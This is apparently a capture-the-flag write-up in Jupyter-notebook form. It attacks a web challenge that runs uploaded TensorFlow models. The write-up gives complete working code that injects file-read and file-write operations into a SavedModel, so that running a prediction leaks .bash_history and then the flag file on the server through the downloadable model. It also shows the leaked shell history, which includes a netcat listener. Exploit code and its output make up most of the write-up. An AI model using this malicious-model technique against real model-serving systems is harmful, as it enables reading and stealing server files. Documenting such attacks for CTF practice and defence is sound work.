## exploit

1. download origin tensorflow model from website.
2. load model to see its structure.

In [13]:
import tensorflow as tf
import numpy as np

origin_model = './'
sess = tf.Session(graph=tf.Graph())

In [14]:
meta_graph_def = tf.saved_model.loader.load(sess, [tf.saved_model.SERVING], origin_model)
signature = meta_graph_def.signature_def

INFO:tensorflow:Restoring parameters from ./variables/variables


In [15]:
signature

{'serving_default': inputs {
  key: "input"
  value {
    name: "embedding_1_input:0"
    dtype: DT_FLOAT
    tensor_shape {
      dim {
        size: -1
      }
      dim {
        size: 512
      }
    }
  }
}
outputs {
  key: "output"
  value {
    name: "dense_1/Sigmoid:0"
    dtype: DT_FLOAT
    tensor_shape {
      dim {
        size: -1
      }
      dim {
        size: 1
      }
    }
  }
}
method_name: "tensorflow/serving/predict"
}

3. modify model structure, inject evil tensor.
4. upload infected model to read flag then write the content into model/upload/saved_model.pb

In [16]:
with tf.Session(graph=tf.Graph()) as sess:

    # Loader START
    meta_graph_def = tf.saved_model.loader.load(sess, [tf.saved_model.SERVING], origin_model)
    signature = meta_graph_def.signature_def

    x = sess.graph.get_tensor_by_name('embedding_1_input:0') # comes from model signature above
    y = sess.graph.get_tensor_by_name('dense_1/Sigmoid:0')
    # Loader END


    # EXP START
#     reader = tf.read_file('/home/ubuntu/.bash_history') # information gathering
    reader = tf.read_file('/home/ubuntu/web3/flag_3deaef310')
    path = tf.constant("/home/ubuntu/web3/model/upload/saved_model.pb") # file path comes from website

    with tf.control_dependencies([tf.write_file(path,reader)]):
        b = tf.constant(0.0,name='write')

    y_exp = tf.add(y,b)
    # EXP END


    # Builder START
    export_path = 'evil_model2'
    builder = tf.saved_model.builder.SavedModelBuilder(export_path)

    signature_inputs = {
        'input': tf.saved_model.utils.build_tensor_info(x)
    }

    signature_outputs = {
        'output': tf.saved_model.utils.build_tensor_info(y_exp) # assign y_exp as output node
    } 

    classification_signature_def = tf.saved_model.signature_def_utils.build_signature_def(
        inputs=signature_inputs,
        outputs=signature_outputs,
        method_name=tf.saved_model.signature_constants.CLASSIFY_METHOD_NAME)

    builder.add_meta_graph_and_variables(
        sess,
        [tf.saved_model.tag_constants.SERVING],
        signature_def_map={
            'serving_default': classification_signature_def
        }#,
        #legacy_init_op=tf.group(tf.tables_initializer())
    )

    builder.save()

INFO:tensorflow:Restoring parameters from ./variables/variables
INFO:tensorflow:No assets to save.
INFO:tensorflow:No assets to write.
INFO:tensorflow:SavedModel written to: evil_model2/saved_model.pb


* cd evil_model && zip -r evil_model.zip saved_model.pb variables/
* then upload evil_model.zip in website frontpage.
* put some string then click 'Submit' to trigger model.predict(). the injected tensor will read content from './flag' then write it to 'model/upload/saved_model.pb'

5. click 'save' to download the current model which contains .bash_history

```
source anaconda3/bin/activate
jupyter-notebook --ip 0.0.0.0 --port 18888
ls
python -V
pip install tensorflow
pip install keras
ipython
apt-get install git
sudo apt-get install git
curl myip.ipip.net
nc -lvp 9999 > web3.zip
ls
unzip web3.zip
ls
cp -r model/ web3/
cp -r build/ web3/
cd web3/
ls
vi flag_3deaef310
python run.py
```

here we see how administrator deploy the website. also, flag in /home/ubuntu/web3/flag_3deaef310

6. Deploy another attack to read flag.
`tf.read_file('/home/ubuntu/web3/flag_3deaef310')`